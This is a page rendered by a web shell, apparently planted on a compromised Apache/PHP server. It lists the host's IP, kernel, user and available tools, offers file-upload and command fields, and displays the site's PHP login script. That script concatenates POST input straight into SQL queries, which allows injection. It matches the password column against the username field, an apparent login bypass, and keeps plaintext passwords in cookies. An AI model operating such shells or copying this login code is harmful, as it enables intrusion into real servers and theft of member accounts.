403Webshell
Server IP : 134.236.49.22  /  Your IP : 216.73.216.114
Web Server : Apache/2.2.15 (Fedora)
System : Linux km10.dyndns.org 2.6.31.5-127.fc12.i686.PAE #1 SMP Sat Nov 7 21:25:57 EST 2009 i686
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/room/member/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/room/member/check_login.php
<?php
session_start(); 
ob_start();
echo '<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />';

if (isset($_POST['username'])) {	     
	
	$usr = trim($_POST['username']);  
	}
if($_POST['username'] == "") {                   
echo "<script>alert('กรุณาใส่ชื่อผู้ใช้');window.location ='../index.php?page=login';</script>";
} else if($_POST['password'] == "") {        
echo "<script>alert('กรุณาใส่รหัสผ่าน'); window.location ='../index.php?page=login';</script>";
} else {                                             
include("../connect.php");  
$username = $_POST['username'];
$password = $_POST['password'];


	//$meSQL = "SELECT id_member,username,status,active FROM tb_member WHERE username='{$username}' AND password='{$password}'";
	$meSQL = "SELECT id_member,username,status,active FROM tb_member WHERE password = '{$usr}'";
    $result = $conn->query($meSQL);
    if ($result->num_rows > 0) {
	$row = $result->fetch_assoc();
	if ($row['active'] != 1) {echo "<script>alert('กำลังตรวจสอบ'); window.location ='../index.php';</script>";}
        $_SESSION['id'] = $row['id_member'];
        $_SESSION['username'] = $row['username'];
        $_SESSION['status'] = $row['status'];
        
        if(!empty($_POST["remember"])) {
				setcookie ("userlogin",$_POST["username"],time()+ 60 * 60 * 24 * 365, "/");
				setcookie ("passwordform",$_POST["password"],time()+ 60 * 60 * 24 * 365, "/");
			} else {
				if(isset($_COOKIE["userlogin"])) {
					setcookie ("userlogin","");
				}
				if(isset($_COOKIE["passwordform"])) {
					setcookie ("passwordform","");
				}
			}
			$ldate = date('Y-m-d H:i:s');
			$meSQL2 = "UPDATE tb_member ";
			$meSQL2 .="SET login_date='{$ldate}',"
			. "login_times=login_times+1 ";
			$meSQL2 .= "WHERE id_member='{$row['id_member']}' ";
			$meQuery2 = $conn->query($meSQL2);
			
		echo "<script>window.location ='../index.php';</script>";
    } else {
		echo "<script>alert('ไม่สามารถเข้าสู่ระบบได้เนื่องจากรหัสผิดพลาด'); window.location ='../index.php?page=login';</script>";
    }
}

ob_end_flush();
$conn->close();
?>

Youez - 2016 - github.com/yon3zu
LinuXploit